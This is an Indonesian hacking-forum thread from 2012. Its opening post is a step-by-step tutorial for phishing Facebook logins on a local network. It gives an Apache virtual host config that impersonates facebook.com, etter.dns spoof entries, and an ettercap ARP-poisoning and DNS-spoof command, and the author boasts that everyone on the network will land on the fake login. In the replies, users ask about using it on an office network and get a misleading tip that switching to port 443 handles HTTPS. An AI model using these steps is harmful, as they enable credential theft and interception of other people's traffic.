Fake login dengan Ettercap + apache
#1
semoga saja nggak salah room nih soalnya bingung mau taruh dimana Big Grin. berhubung ini tutorial, jadi saya taruh disini Tongue

saya cuman mengembangkan tutorialnya bang zee yang mengenain dns_spoofing dengan ettercap yang kemudian dikombinasikan dengan apache2 yang akan menjadi sebuah fakelogin hampir semua situs di internet (kalau nggak males buat fakeloginnya Big Grin)

okedah... kita mulai. pertama buat virtualhost dengan apache :

Code:
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/facebook

kemudian edit file hasil kopi an tadi

Code:
vi /etc/apache2/sites-available/facebook

yang perlu diganti berikut ini :

Code:
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName www.facebook.com
        ServerAlias facebook.com
        ServerAlias id-id.facebook.com
        DocumentRoot /var/www/fake/facebook/
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/fake/facebook/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>

Yang perlu diganti & diisi :

ServerName = nama domain utama
ServerAlias = nama domain lainnya (jika perlu)
DocumentRoot /var/www/fake/facebook/ = lokasi kita meletakkan fakelogin
<Directory /var/www/fake/facebook/> = yang ini juga sama dg yg atas Big Grin

save kemudian enable site tersebut dengan perintah

Code:
a2ensite facebook
service apache2 start

lalu letakkan halaman fake ke direktori tersebut, langsung deh kita eksekusi si ettercap. jangan lupa edit dulu file etter.dns nya dahulu

tambahin baris ini paling bawah

Code:
www.facebook.com A [ip kita]
facebook.com A [ip kita]
id-id.facebook.com [ip kita]

dan kemudian jalankan si ettercap

Code:
ettercap -Tqi wlan0 -P dns_spoof -M arp // //

yap... dengan teknik ini, setiap header http yang mengarah ke situs tersebut akan ditangkap dengan service apache2 sehingga diarahkan ke virtualhost-nya.

kita bisa membuat fakelogin lagi dengan mengcopy /etc/apache2/sites-available/default dan mengkonfigurasinya seperti diatas, memberi folder pribadi dan spoofing alamatnya. Big Grin

nah... kalau begini kan semua yang dijaringan kita akan terkena fakelogin. B)

#2
Nice share om Smile

Ae mau tanya ini kan pake http
kalo https bisa ga?
soalnya di jaringan kantor ane kalo ga pake https ga bisa buka facebook.

mohon pencerahanya om :tkp:
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s

#3
(06-26-2012, 11:39 AM)kuch1k1 Wrote: Nice share om Smile

Ae mau tanya ini kan pake http
kalo https bisa ga?
soalnya di jaringan kantor ane kalo ga pake https ga bisa buka facebook.

mohon pencerahanya om :tkp:

Yup, bisa ajah. D konfig virtual host d atas kan ada 80, gnti aja 443.

Di kantor? Hahaha... Emg kbnykn kntor gitu. Http d blok tp https kaga. Big Grin

#4
(06-26-2012, 12:23 PM)alkaaf Wrote: Yup, bisa ajah. D konfig virtual host d atas kan ada 80, gnti aja 443.

Di kantor? Hahaha... Emg kbnykn kntor gitu. Http d blok tp https kaga. Big Grin

Oke

Iya nih kantor ane https lancar jaya
kalo http di blokir ga bisa fb.n deh

Makasih om
pamit mau ke :tkp:
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s

#5
mantapz omz... izin save omz... Smile

#6
Yup monggo. Kl ada slh silahkan lapor

#7
Makasih tipsnya... nama server adminnya tidak usah di ganti yah? Big Grin
Backtrack
Kisah tentang kita dan Linux

#8
(06-26-2012, 09:21 PM)Backtrack Dragon Wrote: Makasih tipsnya... nama server adminnya tidak usah di ganti yah? Big Grin

Hehe g sbrp perlu jg koq.

#9
Oh iya
tambahin ss donk om bisa ga??

Ane aga pusing untuk mengartikannya,,...
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s

#10
(06-27-2012, 05:39 PM)kuch1k1 Wrote: Oh iya
tambahin ss donk om bisa ga??

Ane aga pusing untuk mengartikannya,,...

waduh... cara ngedit post nya gimana nih ? Big Grin






Users browsing this thread: 1 Guest(s)